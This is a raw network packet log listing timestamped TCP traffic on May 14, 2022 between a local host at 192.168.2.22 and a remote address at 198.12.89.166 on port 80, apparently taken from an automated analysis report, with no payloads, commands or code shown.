May 14, 2022 15:10:55.998756886 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998797894 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998816013 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998857021 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998876095 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998915911 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998934984 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998974085 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998994112 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.999032974 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.999058008 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.999097109 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.999119043 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.999161005 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.999180079 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.999219894 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.999239922 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.999280930 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.015260935 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.091890097 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.091948032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.091974974 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.091986895 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.091999054 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092015982 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092026949 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092029095 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092039108 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092051029 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092061996 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092076063 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092087030 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092099905 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092112064 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092123032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092134953 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092149019 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092164040 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092170954 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092184067 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092196941 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092200041 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092223883 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092233896 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092247009 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092272043 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092288017 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092298031 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.092300892 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092305899 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.092330933 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.095513105 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.100800037 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100840092 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100864887 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100894928 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100919008 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100941896 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100948095 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.100965023 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.100974083 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.100977898 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.100980043 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.100990057 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101003885 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101015091 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101027012 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101039886 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101053953 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101067066 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101074934 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101093054 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101104021 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101119995 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101130962 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101145983 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101155996 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101178885 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101191044 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101206064 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.101217985 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.101250887 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.109577894 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109621048 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109642029 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109668016 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109694958 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109714031 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.109723091 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109734058 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.109750032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109761953 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.109776974 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.109791994 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.109824896 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.109878063 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112771034 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112807989 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112833023 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112833023 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112853050 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112859964 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112876892 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112885952 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112910986 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112934113 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112937927 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112946033 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112958908 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.112972975 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.112997055 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113008976 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113032103 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113044024 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113055944 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113065004 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113080978 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113091946 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113105059 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113115072 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113142014 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113152981 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113188028 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113239050 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113281965 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113289118 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113327026 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113344908 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113398075 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113423109 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113431931 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113476992 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113545895 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113548040 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113555908 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113576889 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113584042 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113604069 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113615990 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113627911 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113639116 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113652945 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113662004 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113682032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113687038 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113709927 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113717079 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113737106 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113754988 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113761902 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113769054 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113789082 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113806963 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113816977 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113843918 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113843918 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113850117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113869905 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113895893 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113903999 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113919020 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113930941 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113943100 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113959074 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113970041 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.113985062 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.113991976 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114012003 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114022970 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114037037 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114051104 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114062071 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114075899 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114089012 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114100933 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114114046 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114126921 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114140034 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114149094 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114165068 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114178896 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114190102 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.114214897 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.114228010 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115096092 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115232944 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115271091 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115315914 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115367889 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115390062 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115427017 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115432978 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115459919 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115473032 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115483999 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115504026 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115510941 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115524054 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115535975 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115556955 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115561962 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115566969 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115588903 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115598917 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115613937 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.115628004 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115648031 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.115881920 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.118222952 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206039906 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206165075 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206168890 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206222057 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206222057 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206280947 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206305981 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206332922 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206384897 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206398964 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206423044 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206454992 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206494093 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206512928 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206547022 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206558943 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206568956 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206619978 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206634998 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206677914 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206696987 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206756115 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206758976 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206808090 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206823111 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206871033 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206887960 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.206934929 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.206954956 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207014084 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207042933 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207067013 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207099915 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207118034 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207128048 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207180023 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207191944 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207238913 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207251072 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207295895 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207309961 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207354069 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207370996 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207421064 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207422018 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207468033 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207479000 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207532883 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207535982 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207571983 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207596064 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207638979 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207653046 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207695007 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207709074 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207750082 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207763910 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207814932 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207829952 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207870960 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.207895994 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.207937956 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.209754944 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215292931 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215346098 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215392113 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215426922 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215435028 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215456963 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215476036 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215481043 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215519905 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215527058 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215564966 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215575933 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215612888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215624094 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215662003 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215692997 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215733051 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215743065 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215784073 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215785980 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215822935 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215826988 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215864897 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215873957 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215914011 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215920925 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.215956926 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.215969086 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216007948 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216010094 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216046095 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216053963 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216088057 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216095924 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216130018 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216140032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216176033 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216182947 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216219902 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216224909 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216264009 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216269970 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216308117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216311932 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216351032 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216357946 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216403961 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216418982 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216459036 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216459990 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216516972 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216536045 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216574907 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216584921 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216622114 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216628075 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216664076 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216672897 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216707945 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216716051 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216753006 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.216758966 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.216799974 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.223418951 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223452091 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223500013 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223522902 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223540068 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223557949 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223576069 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223592997 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223599911 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.223611116 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223634958 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223654985 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223675966 CEST	49173	80	192.168.2.22	198.12.89.166
